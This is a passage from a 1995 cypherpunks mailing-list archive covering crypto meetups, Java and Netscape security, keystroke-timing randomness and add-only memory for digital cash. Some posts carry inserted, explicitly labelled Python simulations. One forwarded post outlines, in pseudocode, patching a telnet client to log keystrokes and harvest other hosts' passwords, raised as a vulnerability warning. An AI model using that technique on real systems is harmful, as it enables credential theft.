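        real = f"{rng.randrange(PIN_SPACE):0{PIN_DIGITS}d}"
        for guess in all_pins():
            verdict = classify(secret, real, guess, one_in)
            if verdict != "reject":
                wins += verdict == "accept"
                break
    return wins / trials


if __name__ == "__main__":
    secret = bytes(range(16))       # constructed card secret
    d = duress_count(secret, "4821", one_in=100)
    print("duress PINs on this card:", d)
    print("blind search succeeds with probability", thief_success_probability(d))
    print("owner typo raises an alarm with probability", typo_alarm_probability(d))
    print("simulated search success rate:",
          simulate_sequential_search(2000, 100, seed=1995))
```

Raising the duress density lowers the search's odds and raises the owner's false-alarm rate by the same factor, which is the trade-off any real deployment would have to pick.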




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Tue, 17 Oct 95 11:35:56 PDT
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <199510171835.OAA02450@ncrhub5.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, Oct 26, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" where I hope to get an update of Lance Cottrell's new
anonymous e-mail server, "mixmaster", exchange keys, and discuss other
topical subjects.

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend.

     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 17 Oct 95 09:43:44 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: java flaw
In-Reply-To: <199510171504.IAA17210@blob.best.net>
Message-ID: <Pine.SUN.3.90.951017113942.26063A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Ehh.. Let's just say that that article was not the most technically accurate.
And you are right it does not scan for viruses. 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 17 Oct 1995, James A. Donald wrote:

> Even if one had genuine artificial intelligence, it would be impossible
> to detect all viruses, only particular viruses and classes of virus.
> 
> If Java is secure, virus scanning should be unnecessary, indeed 
> impossible, because there could be no code configuration capable
> of acting as a virus.
> 
> If virus scanning occurs, then it is possible to write a virus in Java,
> then Java is inherently insecure.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 17 Oct 95 01:01:47 PDT
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510151627.AA15802@toad.com>
Message-ID: <Pine.SOL.3.91.951017113300.12098C-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 15 Oct 1995, Brad Shantz wrote:
> Whoops, wrong.  BETA does not mean code "they know crashes."  In fact 
> it is quite the opposite.  This is pre-release code that they are bug 
> fixing.  most of the catastrophic bugs, they probably know about.  A 
> BETA program is to increase the testing and quality assurance staff 
> to find all of the bugs they DON'T know about.  Then, they will have a 
> reasonable amount of time to fix those bugs before release.  It makes 
> for a much more stable product.

Well it took me 30 minutes to find my first repeatable 'core' dumping
bug in the v2.0beta when I started playing with it this morning.
How stable is that?  Mind you, the bug appears to be probably due to a 
missed variable assignment.
 
I have an idea about where to look for more bugs but I'll 
probably wait some time before I start looking in earnest, I suppose the 
challenge is to look for bugs in the final release version :-).

eric (who wants a 'I debugged netscape' Tshirt to go with his 'I hacked
      netscape' Tshirt and his RSA yoyo :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Felix <felix@delfin.com>
Date: Tue, 17 Oct 95 12:08:56 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
Message-ID: <9510171910.AA02341@delfinsd.delfinsd.delfin.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 10/12/95 -0400, zoetrope@infinet.com wrote:
>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

Do you drive a car to go to work, go to school, or go to the beach?  Or
just, perhaps, because you enjoy tinkering with it?
--
Robin Felix; felix@delfin.com; felix@nosc.mil
619-291-2194(work), 619-291-5852(fax), 619-991-5081(alt)
http://www.delfinsd.delfin.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 17 Oct 95 09:15:06 PDT
To: jamesd@echeque.com (James A. Donald)
Subject: Re: java flaw
In-Reply-To: <199510171504.IAA17210@blob.best.net>
Message-ID: <9510171612.AA25185@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
> > A security feature in Java scans for viruses before activating the
> > applet.
> 
> I hope that this is false.
> 
> Even if one had genuine artificial intelligence, it would be impossible
> to detect all viruses, only particular viruses and classes of virus.
> 
> If Java is secure, virus scanning should be unnecessary, indeed 
> impossible, because there could be no code configuration capable
> of acting as a virus.
> 
> If virus scanning occurs, then it is possible to write a virus in Java,
> then Java is inherently insecure.

To be more precise, if there is programming, sharing, and transitive
information flow, viruses can reproduce and spread (as proven
mathematically in the mid-1980s).  Since Java offers sharing of
programs and (for now at least) transitive information flow, viruses
are possible.

-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Tue, 17 Oct 95 10:25:56 PDT
To: cypherpunks@toad.com
Subject: Re: Using deterministic programs to select private RSA keys.
Message-ID: <9509178139.AA813958011@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     norm@netcom.com(Norman Hardy) writes:
     
     Much has been said recently here about how to produce truly random 
     primes.
     [snip]
     The protocol is to accept a sequence of key strokes for printable 
     ASCII characters.
     [snip]
     
     I suggest that if you capture the time in microseconds between 
     keystrokes and insert the least significant 8 bits between the 
     corresponding characters (i. e. <letter1> <time2 - time1> <letter2> 
     <time3 - time2> <letter3> ... <letter nnn> <time until double CR - 
     time nnn>) and MD5 the set of values, the resulting "random" value 
     will be different for both people who type different input texts as 
     well as those people who type the same input text.
     
     It is important to be sure that you are accessing a true microsecond 
     clock (or other high resolution clock).  For example, in the IBM PC 
     architecture, the clock tic (basic time interrupt) is one per 18.2 
     milliseconds or 55 interrupts per second.  If you were using the clock 
     tic rate and a highly trained typist with a regular typing rate, the 
     interspersed time values might show a consistent set of values.  On 
     the other hand, use of a microsecond clock eliminates this problem.
     
     As regards the observation that MD5 produces only a 128 bit result, 
     you could call MD5 after each nn values (at least 16) have been 
     entered.  In that way a few lines of input and associated timing 
     values could easily generate a value of the same order of magnitude as 
     the number  of 1K primes.
      
     Martin G. Diehl
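
[Added example, not part of the original post.] The interleaving described above, run over constructed keystroke timings, to show how much the low 8 bits of each interval actually vary under a microsecond clock versus the 18.2-per-second PC tick. MD5 is used only because the post names it; the typist model (180 ms mean, 9 ms jitter) and all function names are assumptions.

```python
import hashlib
import math
import random
from collections import Counter

TICK_US = 54_925  # IBM PC timer tick period: 18.2 interrupts/s, about 55 ms


def constructed_key_times(n_keys, seed, mean_us=180_000, jitter_us=9_000):
    """Constructed sample data: n_keys + 1 absolute event times in microseconds
    (one per key press, plus the terminating double CR) for a steady typist."""
    rng = random.Random(seed)
    t, times = 0, []
    for _ in range(n_keys + 1):
        t += max(1, int(rng.gauss(mean_us, jitter_us)))
        times.append(t)
    return times


def read_clock(times_us, resolution_us):
    """What a clock that only advances every resolution_us would have returned."""
    return [t // resolution_us for t in times_us]


def interleave(text, readings):
    """Build <letter1> <t2 - t1> <letter2> <t3 - t2> ... keeping only the
    least significant 8 bits of each interval, as the post describes."""
    data = text.encode("ascii")
    if len(readings) != len(data) + 1:
        raise ValueError("need one clock reading per key plus the terminator")
    out = bytearray()
    for i, ch in enumerate(data):
        out.append(ch)
        out.append((readings[i + 1] - readings[i]) & 0xFF)
    return bytes(out)


def timing_entropy_bits(stream):
    """Empirical Shannon entropy (bits per sample) of the timing bytes only."""
    deltas = stream[1::2]
    counts = Counter(deltas)
    n = len(deltas)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def pooled_digest(stream, values_per_block=16):
    """MD5 every block of values and concatenate the digests. The output grows
    by 128 bits per block, but it never holds more entropy than the input."""
    if values_per_block < 16:
        raise ValueError("the post asks for at least 16 values per MD5 call")
    blocks = [stream[i:i + values_per_block]
              for i in range(0, len(stream), values_per_block)]
    return b"".join(hashlib.md5(b).digest() for b in blocks)


# Constructed input text (64 printable ASCII characters).
TEXT = "the quick brown fox jumps over the lazy dog and keeps on running"

if __name__ == "__main__":
    for label, res in (("microsecond clock", 1), ("18.2 Hz tick", TICK_US)):
        times = constructed_key_times(len(TEXT), seed=1)
        stream = interleave(TEXT, read_clock(times, res))
        print(f"{label:18s} {timing_entropy_bits(stream):.2f} bits/interval, "
              f"{len(set(stream[1::2]))} distinct timing bytes")
        print("    pooled output:", pooled_digest(stream).hex()[:32], "...")
```

The per-interval figure is an upper estimate from one sample; what matters for key generation is how little the tick-clock intervals vary, not the length of the concatenated digests.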





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Westcan1@softnc1.softnc.com (West Canadian Graphics)
Date: Tue, 17 Oct 95 11:49:55 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <9510171851.AA13486@softnc.com>
MIME-Version: 1.0
Content-Type: text/plain


::
Request-Remailing-To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult


> > Promoting the notion that hackers are earnestly attacking
> > Netscape and reporting its bugs increases its credibility to
> > the stock market porkers. Is that not why dear
> > all-too-attentive Jeff has been assigned duty on this list,
> > feeding peanuts to chimp hackers and champ newshacks?

Whoa!!

> I'm afraid you're a little out of line here.
> I've worked with Jeff at a couple different companies
> over the last 6 years.  Besides being a very good programmer
> he's also one of the people I consider the most resistant
> to corporate bullstuff (believe me, we both got a lot of it at MicroUnity).
> I'm sure he's on this list because he thinks it's a good
> idea to pay attention to it.

Maybe he is, but I'd rather hear everyone speak for themself.  You can
speak for you.  And you can let Jeff speak for himself.  And I'd rather
that Netscape speak for itself, too.

Is Jeff or any of the other netscape posters here officially??

Or are they here, just out of personal curiosity (without their employers
knowledge, I mean ...) cause they have a whole lot of spare time on their
hands to learn about cryptography and security.

I wish one of them (or Netscape) would make an official comment to make
sure that the record is straight, and that there is no mis-reporting.

> What the hell is wrong with you people?  Up 'til a few months
> ago, the oft-heard refrain on cipherpunks was "why won't the
> software vendors listen to us?"... now they're listening,

Yep, they seem to be listening.  They just don't seem to be talking.

Can someone say something, please??  Is it true that:

        - Netscape has known about this problem since last week's
          scathing public attack and demonstration of the problem
          which included sample code posted to the Internet??

        - If you run and use a Netscape client, that any machine
          anywhere in the world if it's on the Net could retrieve
          all of the files off of your hard drive or LAN??

          Or even worse ... erase files on your Hard drive and
          wipe you out??

        - Even if your machine is behind a firewall or proxy server,
          that there is no protection??  That you can't do anything??

Can someone comment, please??


          (Carbon copy sent to: postmaster@netscape.com,
                                cypherpunks@toad.com,
                                cert@cert.org)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Oct 95 09:50:44 PDT
To: cypherpunks@toad.com
Subject: NOT_100
Message-ID: <199510171650.MAA26966@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New Yorker of October 23 reports on the "Supernote,"
   a perfect counterfeit $100-bill allegedly being used for
   economic terrorism.

      The Supernote had surfaced around 1990 and originated in
      the Middle East. It was no ordinary counterfeit. The
      workmanship was extraordinary. When a sample first
      arrived at the Secret Service's laboratory, a top
      technical analyst "examined it the way he has every
      other counterfeit note in the world, and called it
      genuine." Most alarming of all, the Supernote was so
      well engineered that it could fool currency scanners at
      the nation's twelve Federal Reserve banks.

      Today, the Supernote remains one of the longest unsolved
      counterfeiting cases in the modern history of the Secret
      Service, and it has begun to undermine international
      confidence in United States currency.

      The Treasury, taking its cue from the Federal Reserve,
      has a difficult time regarding counterfeiting, even on
      a very large scale, as a macroeconomic problem, because
      cash is a relatively small percentage of the total money
      supply. Wire transfers, checks, and credit-card
      transactions, after all, run into the trillions.
      Counterfeiting becomes significant to the Fed only if it
      undermines confidence in the dollar.

      Dozens of interviews with high-level insiders left the
      impression that the Federal Reserve and the Treasury
      don't fear the Supernote itself as much as they fear a
      confidence problem that might result if they publicly
      acknowledge it and countenance a large-scale
      investigation. (As one expert on international terrorism
      who has looked into the Supernote puts it, "If the note
      is that nearly perfect, it doesn't exist.")


   NOT_100  (30 kb in 2 parts)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Mon, 16 Oct 95 20:17:14 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Elementrix Press Release
In-Reply-To: <Pine.3.89.9510112226.A75036-0100000@aix2.uottawa.ca>
Message-ID: <199510170316.NAA10771@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

s1018954@aix2.uottawa.ca wrote:

> On Thu, 12 Oct 1995, Jiri Baum wrote:
> 
> > Still, who knows what surprises QM can provide?
> > 
> > In which case calling it a "telepathic key exchange scheme" might
> > be quite appropriate :-)
> 
> I don't think that's what was meant. After all, using telepathy as a 
> secure channel, you'd still need a comm protocol.

Not really, you can use the raw bitstream as OTP. (Which is probably not
enough to warrant calling it a protocol, maybe protocolette :-)

> The last time I checked
> protocols and algorithms are one and the same. Since elementrix doesn't use
> algorithms, we shouldn't defame them by claiming they've invented secure
> telepathy.        

Well, you could claim that what they are using is not an algorithm since
it won't run on a Turing machine. At that stage you probably toss the
Church-Turing thesis out the window and get yourself a proper definition
of "algorithm".

> Now wouldn't that be interesting to patent?

Gives a new meaning to the phrase "subliminal channels" :-)

> (One wonders if elementrix employees occasionally indulge in guilty 
> glances at Knuth and Sedgewick without their bosses' knowledge.)

Well, wouldn't the bosses give them mind-scans to avoid this possibility?

Sorry, I forgot, Psi Corps doesn't allow that.


Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIMgDixV6mvvBgf5AQEvnQP/dBeNDgbaz23cMhii0yWzDhnAcL+VLmJw
x2x85A35IlSvblSmb647lYj/Bl1k6zpKZkpz+MKrtvh6psy3lTl/tWe2DXzXcoRk
nVwJC5vWCRyVTDMIhRlIoUkbx4QnKVDy1awHWYhIJ4Ssbj6c3G+XPrdvH8LxcSSb
BhxJL63Cp74=
=MDDD
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 17 Oct 95 15:13:39 PDT
To: cypherpunks@toad.com
Subject: [burt@RSA.COM: NSA recommendation on CAPIs]
Message-ID: <199510172028.NAA26789@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 17 Oct 95 10:07:20 PDT
From: burt@RSA.COM (Burt Kaliski)
To: pkcs-11-dev@RSA.COM
Subject: NSA recommendation on CAPIs
Sender: pkcs-11-dev-request@RSA.COM

Greetings --

In case you haven't seen it, NSA has produced a nice
report on cryptographic APIs, available through

  http://www.omg.org/public-doclist.html

The report compares GSSAPI, GCSAPI and Cryptoki, and
recommends the use of each one in various applications.

-- Burt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baum@apple.com (Allen J. Baum)
Date: Tue, 17 Oct 95 14:03:04 PDT
To: cypherpunks@toad.com
Subject: Yardley's 1st ed. "Black Chamber" $25+
Message-ID: <v02120d08aca9ca600cea@[17.255.11.191]>
MIME-Version: 1.0
Content-Type: text/plain


I found one in a bookstore. I didn't buy it, but I'll go back and get it &
ship it if someone is interested.

**************************************************
* Allen J. Baum              tel. (408)974-3385  *
* Apple Computer, MS/305-3B  fax  (408)974-0907  *
* 1 Infinite Loop                                *
* Cupertino, CA 95014        baum@apple.com      *
**************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Tue, 17 Oct 95 08:24:53 PDT
To: cypherpunks@toad.com
Subject: Re: Security Spectra
Message-ID: <1665990655.62370147@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


P.J. Ponder writes:

> In your recent post to the cypherpunks mailing list you proposed a 
> taxonomy of security weaknesses and vulnerabilities, adding that these 

Please watch your attribution.  Vlad Nuri proposed this rating scheme.

> The whole idea of categorizing or ranking holes and vulnerabilities ab 
> initio, outside of their contextual application to a real system is not 
> very helpful.  Systems vary so widely in their criticalities, 
> sensitivities, costs, etc., that each of your pre-defined categorized 
> weaknesses would have to be rejudged - in the context of the system being 
> analyzed - to determine how, and to what extent it could affect the system.

I absolutely agree with you on this point.  I'll point out again that this
is the same problem as creating a rating scheme for the security of
*products*.

> The standard approach as I understand it is to analyze the system against
> all the known vulnerabilities and attempt to measure (maybe only
> qualitatively) the risks associated with the vulnerabilities.

It is popular these days to jump on the risk assessment bandwagon and
forget about assurance.  This occurs because people think risk assessment
is a quick fix that you can do after the system is built and configured.
Some holes cannot be patched.

--Jeff Williams  <mailto:williams@arca.com>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Tue, 17 Oct 95 11:21:02 PDT
To: cypherpunks@toad.com
Subject: DalSemi: Add-Only Memory for Storage of Digital Cash
Message-ID: <199510171820.OAA24348@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


A press release breezed through the list a while back about some
"decoder rings" -- basically, a nonvolatile RAM chip embedded in a
Jostens ring.

On further inspection, it looks to be a superior product to the
DataKey products I remember seeing about ten years ago, targeted at
this same sort of niche. The part in question is much smaller -- it
fits in a ring, after all, or on the usual sorts of key fobs and
employee badges -- and establishing electrical contact to transceive
data is trivial.

Cypherpunks relevance? Twofold. One, the Touch MultiKey
(ftp://ftp.dalsemi.com/pub/datasheets/1991.ps), which promises to hold
three 384 bit blocks under 64-bit passwords. The device will transmit
the stored data under the correct password, and "random bits" under
all other passwords. No crypto here, though, just a simple on-chip
comparison with a stored password. So I assume the determined opponent
with physical access can extract the info; but better that than store
your private key on a publicly accessible machine, no?

Secondly, an app note: "Use of Add-Only Memory for Secure Storage of
Monetary Equivalent Data" (ftp://ftp.dalsemi.com/pub/datasheets/app84.ps).
A creative idea based on the peculiar nature of the EPROMs* that are
also available in this form factor. In particular, one bits may be
burned to zeros, but not vice versa; so why not burn particular bits
to indicate credits and debits?

Knowing that this scheme depends on keeping an attacker from guessing
which bits to burn, they use the unique serial number to uniquely
permute the bits, so that an attacker is as likely to burn a "debit"
bit as a "credit", and far likelier to burn out-of-sequence so that
the monkey business is apparent to any vendor.

And there's another item of note: each chip has a unique, etched,
machine-readable serial number. What are the bets that Dallas
Semiconductor can tell you who purchased that chip? Well, so much for
an anonymous payment scheme based on *this* product.

Still, if I had to choose a place to keep a secret key, I'd choose my
knuckle over my key ring, let alone a floppy disk, PDA, or portable
computer.

nathan
* Gee, back in my day EPROMs were Erasable; these folks mean instead
  to indicate an Electrically Programmable chip, which sounds like a
  good old PROM to me. Ahhh, acronyms...
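
Added example, not from the original post or from the Dallas Semiconductor app note: a Python model of the add-only credit/debit idea described above, showing why a blind burn is almost always caught. The two unary counters, the HMAC-based shuffle, the vendor key, the 64-bit size and all names are assumptions made for illustration; the post only says that the serial number permutes the bits.

```python
import hashlib
import hmac

N_BITS = 64          # physical bits on the constructed device (assumption)
SLOTS = N_BITS // 2  # logical slots per unary counter


class TamperError(Exception):
    """Burned bits do not form a valid in-sequence pattern."""


class AddOnlyMemory:
    """All bits start at 1; a burn clears a bit and nothing can set it again."""

    def __init__(self, serial: bytes, bits: int = (1 << N_BITS) - 1):
        self.serial = serial
        self.bits = bits

    def burn(self, pos: int) -> None:
        self.bits &= ~(1 << pos)

    def burned(self, pos: int) -> bool:
        return (self.bits >> pos) & 1 == 0


def layout(serial: bytes, vendor_key: bytes):
    """Serial-keyed Fisher-Yates shuffle of the physical bit positions.

    Returns (credit_slots, debit_slots), each in the order they must be burned.
    The keyed PRF (HMAC-SHA256) is an assumption, not the app note's method.
    """
    pos = list(range(N_BITS))
    for i in range(N_BITS - 1, 0, -1):
        mac = hmac.new(vendor_key, serial + i.to_bytes(2, "big"), hashlib.sha256)
        j = int.from_bytes(mac.digest(), "big") % (i + 1)
        pos[i], pos[j] = pos[j], pos[i]
    return pos[:SLOTS], pos[SLOTS:]


def _count_prefix(mem, slots):
    """Length of the burned prefix; any burned bit after a gap is tampering."""
    flags = [mem.burned(p) for p in slots]
    n = flags.index(False) if False in flags else len(flags)
    if any(flags[n:]):
        raise TamperError("out-of-sequence burn")
    return n


def read_card(mem, vendor_key):
    """Return (credits, debits) or raise TamperError."""
    credit_slots, debit_slots = layout(mem.serial, vendor_key)
    credits = _count_prefix(mem, credit_slots)
    debits = _count_prefix(mem, debit_slots)
    if debits > credits:
        raise TamperError("more debits than credits")
    return credits, debits


def add(mem, vendor_key, credits=0, debits=0):
    """Vendor-side update: burn the next slots of each counter in sequence."""
    have_c, have_d = read_card(mem, vendor_key)
    if have_c + credits > SLOTS or have_d + debits > SLOTS:
        raise ValueError("counter exhausted; card must be retired")
    if have_d + debits > have_c + credits:
        raise ValueError("insufficient balance")
    credit_slots, debit_slots = layout(mem.serial, vendor_key)
    for p in credit_slots[have_c:have_c + credits]:
        mem.burn(p)
    for p in debit_slots[have_d:have_d + debits]:
        mem.burn(p)
    return read_card(mem, vendor_key)


def blind_burn_outcomes(mem, vendor_key):
    """Classify every single-bit burn someone without the key could make."""
    base = read_card(mem, vendor_key)
    tally = {"gained credit": 0, "lost to debit": 0, "detected": 0}
    for p in range(N_BITS):
        if mem.burned(p):
            continue
        trial = AddOnlyMemory(mem.serial, mem.bits)
        trial.burn(p)
        try:
            after = read_card(trial, vendor_key)
        except TamperError:
            tally["detected"] += 1
            continue
        tally["gained credit" if after[0] > base[0] else "lost to debit"] += 1
    return tally


VENDOR_KEY = b"constructed-demo-key"                      # constructed value
card = AddOnlyMemory(serial=b"\x00\x00\x00\x00\x12\x34")  # constructed serial
add(card, VENDOR_KEY, credits=5)
add(card, VENDOR_KEY, debits=2)

if __name__ == "__main__":
    print(read_card(card, VENDOR_KEY))
    print(blind_burn_outcomes(card, VENDOR_KEY))
```

Of the 57 unburned bits on this card, exactly one advances the credit counter and one advances the debit counter; the other 55 leave an out-of-sequence pattern that any reader holding the key rejects.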




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 17 Oct 95 12:19:12 PDT
To: Chris Claborne <cypherpunks@toad.com
Subject: Re: San Diego Cypherpunks Physical Meeting
In-Reply-To: <199510171835.OAA02450@ncrhub5.attgis.com>
Message-ID: <9510171918.AA01407@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain




>   Don't forget to bring your public key  fingerprint.  If you can figure
>out how to get it on the back of a business card, that would be cool.  

How about a combined message digest/url barcoded into the card?

Then standard scanner type software could be programmed to pick it up.

So how to get 128 bits + ??? for the URL onto a card?

Limited resolution here...


If someone has a proposal I can circulate it through to the W3C members. I'm 
sure there would be interest.
	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Oct 95 12:46:56 PDT
To: cypherpunks@toad.com
Subject: BeBox Security Hole?
Message-ID: <v02120d06aca9a270c12d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



This looks like fun...

Cheers,
Bob Hettinga


>Date: Mon, 16 Oct 1995 23:07:58 -0700
>From: crawford@scruznet.com (Michael D. Crawford)
>To: semper.fi@abs.apple.com, dev@be.com
>Subject: Re: BeBox development questions and answers
>Message-ID: <199510170607.XAA06319@scruz.net>
>
>Jonah Benton asked Melissa Rogers about security:
>
>>>>are there ways of excluding certain users from certain parts of the file
>>>>system?
>>>No
>>>>
>>>>i believe you support telnet- can multiple users telnet in at once?
>>>>
>>>Yes
>
>The answers to these two questions suggest the existence of the following
>serious security problem, which can cause breaches on any other machine on
>the network.  This is a time-honored way for hackers to bust into machines
>on the Internet.
>
>do{
>   telnet to an Internet host that does not have adequate security
>
>   Patch the telnet client on the Be box to save keystrokes into a file
>
>   Log out
>
>   Wait a couple weeks
>
>   Telnet back in, retrieve the file.
>
>   Now you have the host names, account names, and passwords for several other
>   machines
>}while ( Internet != destroyed );
>
>Would someone from Be care to clarify?
>
>This isn't exactly on-topic for this list, but it is a serious problem.
>It's been going on for years on other OS's.
>
>Mike
>
>Michael D. Crawford             | I use anonymous digital cash from DigiCash.
>crawford@scruznet.com           | Join the e-Cash trial at:
>http://www.scruz.net/~crawford/ | http://www.digicash.com
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Oct 95 12:46:56 PDT
To: cypherpunks@toad.com
Subject: e$: Reuters Smells the Coffee
Message-ID: <v02120d03ac526025ff8b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Sat, 12 Aug 1995 00:01:58
From: infocker@megaweb.com
Sender: infocker@megaweb.com () (from unknown.aol.com 205.188.2.111)
To: www-buyinfo@allegra.att.com
Subject: Cyber Economy--Govts. Cannot Control

Thought Mr. Hettinga might particularly appreciate this perspective.

Jim Rapp
Alexandria, Virginia
"give me more info"

As always, do not send the copyright police after me.


LONDON - Growing business on the Internet computer network could
allow companies and individuals to avoid taxes and build up a black
economy increasingly out of range of government intervention and
regulation, computer experts say.

People will be able to download computer programs from
Philadelphia to Paris or buy books from Madrid in Manila, avoiding
export or import duties and sales taxes, as well as bypassing
government trade statistics.

"Electronic purses," loaded from banks down telephone lines,
could become the favored means of payment for fast, anonymous and
secure payments, with currencies of choice becoming more exotic,
depending on what is acceptable to dealmakers.

"Cyberdollars," expatriate U.S. currency zapping across telephone
lines between computers, could add to problems posed for authorities
by existing funds outside national borders.

Deals on the Internet are mainly completed by credit card at
present. But electronic purses could lead to a buildup of currency
beyond the control of governments and central banks, further limiting
their influence on economies and markets and making traditional
monetary tools like interest rates less effective.

"Online business will involve much more economic activity outside
the control and ambit of government," Madsen Pirie, director of the
Adam Smith Institute, a right-wing British think-tank, told Reuters.

"Government will have to limit its ambitions. Just like
governments in the modern world find it difficult to have exchange
control; they can't control billions of dollars of cash sloshing
around foreign exchange markets," he said.

Business is fairly modest now but will increase exponentially,
Pirie forecasts.

The U.S. Commerce Department has said electronic cash will
account for 20 percent of U.S. purchases by 2005, up from just over 4
percent last year and compared with just over 16 percent forecast by
2000.

Leaders of the information technology industry believe that the
embryonic stage is over and are wary of government action, which they
feel might inhibit growth.

Analysts reckon that any attempt to regulate cybermarkets is
likely to be futile.

The Adam Smith Institute's Pirie agrees, predicting: "Governments
will fail if they try to control this. They always have when they try
to hold back the way history is going."

- - - - -

Copyright, Reuters America Inc. All rights reserved
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Oct 95 12:52:27 PDT
To: cypherpunks@toad.com
Subject: re: e$: Reuters Smells the Coffee
Message-ID: <v02120d00aca9b9a7fbdb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, folks.

Eudora got the best of me there...

Sorry for the bandwidth...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 17 Oct 95 16:27:08 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
